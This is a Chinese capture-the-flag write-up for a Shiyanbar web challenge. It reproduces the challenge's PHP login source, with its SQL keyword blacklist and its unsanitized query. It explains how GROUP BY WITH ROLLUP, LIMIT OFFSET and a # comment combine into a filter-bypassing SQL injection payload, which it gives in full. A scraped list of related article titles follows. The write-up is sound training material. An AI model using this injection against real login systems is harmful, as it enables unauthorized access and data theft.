实验吧 因缺思汀的绕过
来源:互联网 发布:windows更新清理 编辑:程序博客网 时间:2024/05/21 06:02
解题连接http://ctf5.shiyanbar.com/web/pcat/index.php
查看源代码
<form action="" method="post"><br/><inputname="uname"type="text"/><br/><inputname="pwd"type="text"/><br/><inputtype="submit" /><br/></form><br/><!--source: source.txt--><br/>
查看http://ctf5.shiyanbar.com/web/pcat/source.txt
<?phperror_reporting(0);if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {echo '<form action="" method="post">'."<br/>";echo '<input name="uname" type="text"/>'."<br/>";echo '<input name="pwd" type="text"/>'."<br/>";echo '<input type="submit" />'."<br/>";echo '</form>'."<br/>";echo '<!--source: source.txt-->'."<br/>"; die;}function AttackFilter($StrKey,$StrValue,$ArrReq){ if (is_array($StrValue)){ $StrValue=implode($StrValue); } if (preg_match("/".$ArrReq."/is",$StrValue)==1){ print "姘村彲杞借垷锛屼害鍙禌鑹囷紒"; exit(); }}$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";foreach($_POST as $key=>$value){ AttackFilter($key,$value,$filter);}$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");if (!$con){die('Could not connect: ' . mysql_error());}$db="XXXXXX";mysql_select_db($db, $con);$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";$query = mysql_query($sql); if (mysql_num_rows($query) == 1) { $key = mysql_fetch_array($query); if($key['pwd'] == $_POST['pwd']) { print "CTF{XXXXXX}"; }else{ print "浜﹀彲璧涜墖锛�"; }}else{print "涓€棰楄禌鑹囷紒";}mysql_close($con);?>发现过滤了不少东西,查询语句为
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";第一层
if (mysql_num_rows($query) == 1)Mysql知识点:limit
例如limit 1 就是从第一条开始查,limit 2 从第二条开始查。
第二层
if($key['pwd'] == $_POST['pwd'])当pwd查出来的为空就行了
Mysql知识点:group by pwd with rollup
转载http://blog.csdn.net/id19870510/article/details/6254358点击打开链接
发现新建的第二条为空。
如果我们希望再显示部门的平均值和全部雇员的平均值,普通的 GROUP BY 语句是不能实现的,需要另外执行一个查询操作,或者通过程序来计算。如果使用有 WITH ROLLUP 子句的 GROUP BY 语句,则可以轻松实现这个要求:
如limit 1 offset 1就是从第一条开始查的第一条
limit 1 offset 2就是从第一条开始查的第二条
Mysql知识点:#号
#号的作用是注释掉后面语句,因为响应是uname=&pwd=
所以要将后面的&pwd=注释掉
所以payload为
' or 1=1 group by pwd with rollup limit 1 offset 2#
0 0
- 实验吧 因缺思汀的绕过
- 实验吧-因缺思汀的绕过WriteUp
- 实验吧-因缺思汀的绕过
- 实验吧-因缺思厅的绕过writeup
- 因缺思汀的绕过
- 因缺思汀的绕过
- CTF实验吧-因缺思汀的绕过【group by,with rollup,limit offset的利用】
- 实验吧 因缺思汀的绕过 By Assassin(with rollup统计)
- 上传绕过-实验吧
- CTF实验吧-简单的sql注入【SQL注入关键词绕过】
- 一次尝试绕过ClassLoader双亲委派的实验
- CTF实验吧-上传绕过【0x00截断】
- 因host命令导致无法正常SHUTDOWN的实验
- [基本实验] 利用Burp和FireBug绕过上传漏洞的前端防护
- 绕过空格的注入
- 绕过代理服务器和绕过封锁的网站的简单方法
- 绕过拦截的弹出窗口
- 简介绕过DarkSpy的方法
- leetcode: Reorder List 的Python实现
- linux下Nginx遇到的问题
- 平衡二叉树,AVL树之图解篇
- linux内核日志及printk结构浅析
- c++ shared_ptr误区之row pointer被多组shared_ptr拥有
- 实验吧 因缺思汀的绕过
- redis基本操作命令
- 第二类斯特林数
- POJ 1152 An Easy Problem! 笔记
- 动态生成的元素无法触发事件
- 移动端数据库神器-Realm 开始代码之旅(入门二)
- npm常用命令
- Windows关闭135,139,445端口
- 进程与线程的一个简单解释